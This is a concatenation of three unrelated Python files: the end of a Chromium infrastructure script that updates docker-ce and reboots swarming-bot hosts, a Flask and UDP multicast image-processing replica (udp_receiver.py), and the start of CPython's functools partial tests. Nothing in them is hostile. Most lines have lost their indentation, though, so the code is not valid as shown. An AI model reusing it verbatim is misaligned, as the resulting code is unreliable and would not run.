This automatically keeps the docker package up to date, and running the
update just prior to reboot ensures that no containers are running, so there
are no disruptions. This will also remove older docker packages
(docker-engine) automatically.
Args:
canary: (bool) If this is a canary host or not.
docker_version: (str) Docker package version to ensure is installed.
"""
package_with_version = 'docker-ce'
if canary:
# This will cause apt to install the latest version.
logging.info('Ensuring the latest version of docker-ce is installed.')
else:
package_with_version = 'docker-ce=%s' % docker_version
logging.info('Ensuring %s is installed.', package_with_version)
# Not doing a lot of dpkg/apt-cache checking here as the runtime to just try
# an install is only 1.1 seconds.
try:
subprocess.check_call(['/usr/bin/apt-get', 'update'])
except subprocess.CalledProcessError:
# Don't abort the reboot just because the update failed; only abort if the
# install itself fails.
logging.exception('Unable to apt-get update.')
try:
subprocess.check_call(['/usr/bin/apt-get', 'install', '-y',
package_with_version])
except subprocess.CalledProcessError:
logging.exception('Unable to install/upgrade docker-ce to %s.',
package_with_version)
return False
return True
def reboot_host(canary=False, docker_version=''):
if docker_version:
if not update_docker(canary, docker_version):
logging.warning('Not rebooting, something went wrong.')
return
# This script runs as root.
try:
subprocess.check_call(['/sbin/reboot'])
except subprocess.CalledProcessError:
logging.exception('Unable to reboot host.')
class FlockTimeoutError(Exception):
pass
@contextlib.contextmanager
def flock(lock_file, retries=20, sleep_duration=3): # pragma: no cover
logging.debug('Acquiring file lock on %s...', lock_file)
i = 0
while True:
try:
with daemon.flock(lock_file):
logging.debug('Lock acquired on %s.', lock_file)
try:
yield
finally:
logging.debug('Releasing lock on %s.', lock_file)
break
except daemon.LockAlreadyLocked:
if i == retries - 1:
raise FlockTimeoutError()
else:
logging.debug('Lock on %s busy; sleeping for %d seconds.',
lock_file, sleep_duration)
i += 1
time.sleep(sleep_duration)
def reboot_gracefully(args, running_containers):
"""Reboot the host and attempt to gracefully stop running containers.
Returns:
True if the reboot sequence has been started; callers should not spawn new
containers. The actual reboot may not be triggered yet if tasks are still
running.
"""
uptime = get_host_uptime()
fuzzed_max_host_uptime = fuzz_max_uptime(args.max_host_uptime)
mins_since_scheduled_reboot = uptime - fuzzed_max_host_uptime
if mins_since_scheduled_reboot > 0:
logging.debug('Host uptime over fuzzed max uptime (%d > %d).',
uptime, fuzzed_max_host_uptime)
else:
return False
if running_containers:
if mins_since_scheduled_reboot > args.reboot_grace_period:
logging.warning(
'Drain exceeds grace period of %d min. Rebooting host now '
'despite %d running containers.', args.reboot_grace_period,
len(running_containers))
reboot_host(args.canary, args.docker_version)
else:
logging.debug(
'Still %d containers running. Shutting them down first.',
len(running_containers))
for c in running_containers:
c.kill_swarming_bot()
else:
logging.debug('No running containers. Rebooting host now.')
reboot_host(args.canary, args.docker_version)
return True
def launch_containers(
docker_client, container_descriptors, args): # pragma: no cover
rebooting_host = os.path.exists(BOT_REBOOT_FILE)
draining_host = os.path.exists(BOT_SHUTDOWN_FILE)
draining_container_descriptors = [
cd for cd in container_descriptors if os.path.exists(cd.shutdown_file)
]
if draining_host:
logging.info(
'In draining state due to existence of %s. No new containers will be '
'created.', BOT_SHUTDOWN_FILE)
elif rebooting_host:
logging.info(
'In draining state due to existence of %s. No new containers will be '
'created and host will be restarted.', BOT_REBOOT_FILE)
elif draining_container_descriptors:
logging.info(
'Draining containers %s due to existence of files: %s. They will not '
'be restarted automatically.',
[cd.name for cd in draining_container_descriptors],
[cd.shutdown_file for cd in draining_container_descriptors])
# Cleanup old containers that were stopped from a previous run.
# TODO(bpastene): Maybe enable auto cleanup with the -rm option?
docker_client.delete_stopped_containers()
running_containers = docker_client.get_running_containers()
# If there are no running containers, use this as an opportunity to clean
# up old images. It shouldn't take long.
image_url = (
_REGISTRY_URL + '/' + args.registry_project + '/' + args.image_name)
if not running_containers:
docker_client.remove_outdated_images(image_url)
if (not draining_host and not rebooting_host and args.max_host_uptime
and reboot_gracefully(args, running_containers)):
return
# Fetch the image from the registry if it's not present locally.
if not docker_client.has_image(image_url):
logging.debug('Local image missing. Fetching %s ...', image_url)
docker_client.login(_REGISTRY_URL, args.credentials_file)
docker_client.pull(image_url)
logging.debug('Image %s fetched.', image_url)
# Send SIGTERM to bots in containers that have been running for too long, or
# all of them regardless of uptime if draining. For Android containers (see
# infra.services.android_swarm package), some containers may go missing due
# to associated devices missing, so we need to examine *all* containers here
# instead of doing that inside the per-container flock below.
current_cipd_version = get_cipd_version()
if draining_host or rebooting_host:
for c in running_containers:
c.kill_swarming_bot()
if rebooting_host and not running_containers:
os.remove(BOT_REBOOT_FILE)
reboot_host(args.canary, args.docker_version)
else:
for cd in draining_container_descriptors:
c = docker_client.get_container(cd)
if c is not None:
c.kill_swarming_bot()
docker_client.stop_old_containers(
running_containers, args.max_container_uptime)
# Also stop any outdated container.
for c in running_containers:
if current_cipd_version is not None:
if c.labels.get('cipd_version') != current_cipd_version:
logging.debug(
'CIPD pkg version used to launch container %s has changed. '
'Shutting the container down.', c.name)
c.kill_swarming_bot()
continue
if not docker_client.image_matches_url(c.image, image_url):
logging.debug(
'Image of container %s is outdated. Shutting the container down.',
c.name)
c.kill_swarming_bot()
# Make sure all requested containers are running.
def _create_container(container_desc):
try:
with flock(container_desc.lock_file):
c = docker_client.get_container(container_desc)
if c is None:
labels = {}
# Attach current cipd version to container's metadata so it can
# be restarted if version changes.
if current_cipd_version is not None:
labels['cipd_version'] = current_cipd_version
docker_client.create_container(
container_desc, image_url, args.swarming_server, labels)
elif c.state == 'paused':
# Occasionally a container gets stuck in the paused state. Since
# the logic here is thread safe, this shouldn't happen, so
# explicitly unpause them before continuing.
# TODO(bpastene): Find out how/why.
logging.warning('Unpausing container %s.', c.name)
c.unpause()
else:
logging.debug('Nothing to do for container %s.', c.name)
except FlockTimeoutError:
logging.error(
'Timed out while waiting for lock on container %s.',
container_desc.name)
threads = []
docker_client.set_num_configured_containers(len(container_descriptors))
for cd in container_descriptors:
# TODO(sergiyb): Remove should_create_container logic from this generic
# container management loop and move it outside of the launch_container
# function as it's specific to Android devices only and thus should only
# be in the android_docker package.
if (cd.should_create_container() and
cd not in draining_container_descriptors):
# Split this into threads so a blocking container doesn't block the
# others (and also for speed!)
t = threading.Thread(target=_create_container, args=(cd,))
threads.append(t)
t.start()
for t in threads:
t.join()
def add_launch_arguments(parser): # pragma: no cover
def max_uptime(value):
value = int(value)
if value < _MIN_HOST_UPTIME and value != 0:
raise argparse.ArgumentTypeError(
          '--max-host-uptime must be >= %d or zero' % _MIN_HOST_UPTIME)
return value
parser.add_argument(
'-c', '--canary', action='store_true', default=False,
help='Run this as a canary bot.')
parser.add_argument(
'--docker-version',
default='',
help='The docker-ce version to be ensured is installed (ex: '
'18.06.3~ce~3-0~ubuntu). These values are supplied by puppet. If not '
'specified, no update will be triggered.')
parser.add_argument(
'--max-container-uptime', type=int, default=60 * 4,
help='Max uptime of a container, in minutes.')
parser.add_argument(
'--reboot-grace-period', type=int, default=60 * 4,
help='How long to wait (in minutes) for swarming bots to gracefully '
'shutdown before triggering a host reboot. Should be at least as '
'long as the longest expected task run time. Defaults to 4 hours.')
parser.add_argument(
'--image-name', default='swarm_docker:latest',
help='Name of docker image to launch from.')
parser.add_argument(
'--swarming-server', default='https://chromium-swarm.appspot.com',
help='URL of the swarming server to connect to.')
parser.add_argument(
'--registry-project', default='chromium-container-registry',
help='Name of gcloud project id for the container registry.')
parser.add_argument(
'--credentials-file',
default='/creds/service_accounts/'
'service-account-container_registry_puller.json',
help='Path to service account json file used to access the gcloud '
'container registry.')
parser.add_argument(
'--max-host-uptime', type=max_uptime, default=60 * 24,
help='Max uptime of the host, in minutes. A value of zero indicates the '
'host will never be rebooted automatically.')
def configure_logging(log_filename, log_prefix, verbose): # pragma: no cover
logger = logging.getLogger()
logger.setLevel(logging.DEBUG if verbose else logging.WARNING)
log_fmt = logging.Formatter(
      '%(asctime)s.%(msecs)03d %(levelname)s ' + log_prefix + ' %(message)s',
datefmt='%y%m%d %H:%M:%S')
file_handler = logging.handlers.RotatingFileHandler(
'/var/log/chrome-infra/%s' % log_filename,
maxBytes=10 * 1024 * 1024, backupCount=5)
file_handler.setFormatter(log_fmt)
logger.addHandler(file_handler)
stdout_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stdout_handler)
# Quiet some noisy modules.
cmd_helper_logger = logging.getLogger('devil.utils.cmd_helper')
cmd_helper_logger.setLevel(logging.ERROR)
urllib3_logger = logging.getLogger('requests.packages.urllib3.connectionpool')
urllib3_logger.setLevel(logging.WARNING)
# urllib3's module path is different when invoked via vpython.
# TODO(crbug.com/977627): Remove the old path when we tear out infra VENV
# support.
vypy_urllib3_logger = logging.getLogger('urllib3.connectionpool')
vypy_urllib3_logger.setLevel(logging.WARNING)
@contextlib.contextmanager
def main_wrapper(): # pragma: no cover
if not sys.platform.startswith('linux'):
print('Only supported on linux.', file=sys.stderr)
sys.exit(1)
try:
yield
except containers.FrozenEngineError:
logging.exception('Docker engine frozen, triggering host reboot.')
# Skipping updates since something is very wrong with docker here.
reboot_host()
except Exception as e:
logging.exception('Exception:')
raise e
|
udp_receiver.py
|
import flask
import numpy as np
import os
import requests
import sys
import cv2 as cv  # A plain import works across opencv-python versions.
from socket import (AF_INET, SOCK_DGRAM, INADDR_ANY, IPPROTO_IP,
                    IP_ADD_MEMBERSHIP, SOL_SOCKET, SO_REUSEADDR, socket,
                    inet_aton, error as socket_error)
import struct
from threading import Thread
import imagehash
from PIL import Image
class Request():
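    """A single frame-processing request: the frame number, the requested
    method (e.g. "canny" or "contour") and the checksum of the result."""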
def __init__(self, frame, method):
self.frame = frame
self.method = method
self.checksum = ""
def update_checksum(self, checksum):
self.checksum = checksum
def get_frame(self):
return self.frame
def get_method(self):
return self.method
def get_checksum(self):
return self.checksum
replica_number = 1
host = "localhost"
multicast_group = "230.255.255.255"
multicast_port = 20000
#sequencer_port = 20000
timeout = 3
buf = 1024
app = flask.Flask(__name__)
requests_awaiting = {}
requests_finished = []
success_req = {}
delivered_req = {}
fail_req = {}
# TODO : Figure out how to synchronize sequence count between sequencer and implementation
seq_count = 1
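# Frames may be processed as soon as they arrive, but they are only marked
# "delivered" (announced over multicast) in sequence-number order, starting
# from seq_count, by checkRequestsAwaiting().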
@app.route('/getUDPPort', methods=['GET'])
def getUDPPort():
_, temp_port = serv.get_port()
return str(temp_port)
@app.route('/getJob/<seq_num>', methods=['GET'])
def publishFrame(seq_num):
print(str(seq_num))
file_path = "../python/jobs/f" + str(seq_num) + ".jpg"
if os.path.isfile(file_path):
return flask.send_file(file_path, mimetype='image/jpg')
else:
return flask.send_file("images/color_fail.jpg", mimetype='image/jpg')
def getFrame(frame_num):
img_url = "http://localhost:8080/rest/openiss/getStaticFrame/" + str(frame_num)
response = requests.get(img_url)
result = response.content
return np.frombuffer(result, dtype=np.uint8)
def deliverFrame(frame_num):
# checksum = requests_awaiting[frame_num].checksum
addr = (multicast_group, multicast_port)
udp_string = str(frame_num) + ",delivered," + str(replica_number)
udp_socket = socket(AF_INET,SOCK_DGRAM)
udp_socket.sendto(udp_string.encode(), addr)
print("Sending %s ..." % udp_string)
udp_socket.close()
def processFrame(frame_num):
if requests_awaiting[frame_num].get_method() == "canny":
doCanny(frame_num)
elif requests_awaiting[frame_num].get_method() == "contour":
doContour(frame_num)
else:
print("Method called does not exist on web service! Skipping...")
requests_awaiting.pop(frame_num, None)
def checkRequestsAwaiting():
global seq_count
while seq_count in requests_awaiting:
deliverFrame(seq_count)
requests_awaiting.pop(seq_count, None)
requests_finished.append(seq_count)
seq_count += 1
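# Status reports received from other replicas, keyed by frame number; each
# value is the list of replica numbers that reported that status.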
def addToSharedQueues(frame_num, method, replica_num):
global success_req, seq_count
if method == "success":
if frame_num not in success_req:
success_req[frame_num] = []
success_req[frame_num].append(replica_num)
elif method == "fail":
if frame_num not in fail_req:
fail_req[frame_num] = []
fail_req[frame_num].append(replica_num)
else:
if frame_num not in delivered_req:
delivered_req[frame_num] = []
delivered_req[frame_num].append(replica_num)
def doCanny(seq_num):
x = getFrame(seq_num)
img = cv.imdecode(x, cv.IMREAD_UNCHANGED)
if img is None:
print("Error loading image")
return
img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
    edges = cv.Canny(img_gray, 50, 150, apertureSize=3, L2gradient=False)
edges = cv.cvtColor(edges, cv.COLOR_GRAY2BGR)
print("Saving canny...")
# cv.imwrite("../python/jobs/canny.jpg", edges)
file_name = "../python/jobs/f" + str(seq_num) + ".jpg"
sys.stdout.flush()
cv.imwrite(file_name, edges)
checksum = imagehash.average_hash(Image.open(file_name))
requests_awaiting[seq_num].checksum = checksum
def doContour(seq_num):
x = getFrame(seq_num)
img = cv.imdecode(x, cv.IMREAD_UNCHANGED)
if img is None:
print("Error loading image")
return
img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
    _, img_thresh = cv.threshold(img_gray, 100, 255, cv.THRESH_BINARY)
print("Saving contour...")
img_thresh = cv.cvtColor(img_thresh, cv.COLOR_GRAY2BGR)
#cv.imwrite("contour.jpg", img_thresh)
file_name = "../python/jobs/f" + str(seq_num) + ".jpg"
cv.imwrite(file_name, img_thresh)
checksum = imagehash.average_hash(Image.open(file_name))
requests_awaiting[seq_num].checksum = checksum
class UDPServer():
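    """Joins the multicast group and handles incoming UDP messages.
    Status messages ("success", "fail", "delivered") from other replicas are
    recorded; new job messages are processed and delivered in sequence order.
    """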
def __init__(self):
self._running = True
self.sock = socket(AF_INET, SOCK_DGRAM)
self.buf = buf
self.timeout = timeout
        # struct ip_mreq: multicast group address plus local interface (any).
        self.group = inet_aton(multicast_group) + inet_aton("0.0.0.0")
        # Allow address reuse and bind before joining the multicast group.
        self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        self.sock.bind(("", multicast_port))
        self.sock.setsockopt(IPPROTO_IP, IP_ADD_MEMBERSHIP, self.group)
def terminate(self):
self._running = False
self.sock.shutdown(0)
self.sock.close()
def is_running(self):
return self._running
def get_port(self):
return self.sock.getsockname()
def run(self):
global seq_count
while True:
try:
print("Waiting to receive data...")
sys.stdout.flush()
                data, address = self.sock.recvfrom(self.buf)
if data:
strings = data.decode('utf-8')
seq_num = int(strings.split(',')[0])
method = strings.split(',')[1]
print("Message:", method, seq_num, "Address: ", address)
if(method == "success" or method == "fail" or method == "delivered"):
replica_num = int(strings.split(',')[2])
if replica_num != replica_number:
addToSharedQueues(seq_num, method, replica_num)
                    elif (seq_num >= seq_count and seq_num not in requests_finished
                          and seq_num not in requests_awaiting):
requests_awaiting[seq_num] = Request(seq_num, method)
processFrame(seq_num)
checkRequestsAwaiting()
else:
print("Packet with sequence number ", seq_num, " already received!")
sys.stdout.flush()
except socket_error:
self.sock.close()
break
# Main execution
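# The UDP listener runs on a background thread so the Flask app below can
# serve its HTTP endpoints concurrently; terminate() closes the socket to
# stop the listener.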
serv = UDPServer()
t = Thread(target=serv.run)
t.start()
if __name__ == '__main__':
app.run(host='127.0.0.1', port=8001)
# If here, ctrl+c was called
serv.terminate()
t.join()
sys.exit()
|
test_functools.py
|
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
import os
import weakref
import gc
from weakref import proxy
import contextlib
from test.support import import_helper
from test.support import threading_helper
from test.support.script_helper import assert_python_ok
import functools
py_functools = import_helper.import_fresh_module('functools',
blocked=['_functools'])
c_functools = import_helper.import_fresh_module('functools',
fresh=['_functools'])
decimal = import_helper.import_fresh_module('decimal', fresh=['_decimal'])
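# The test classes below are parametrized over both implementations: the
# pure-Python module (py_functools) and the C-accelerated one (c_functools).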
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
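    # Shared partial() tests; concrete subclasses supply self.partial and an
    # AllowPickle context manager for the C and pure-Python implementations.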
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
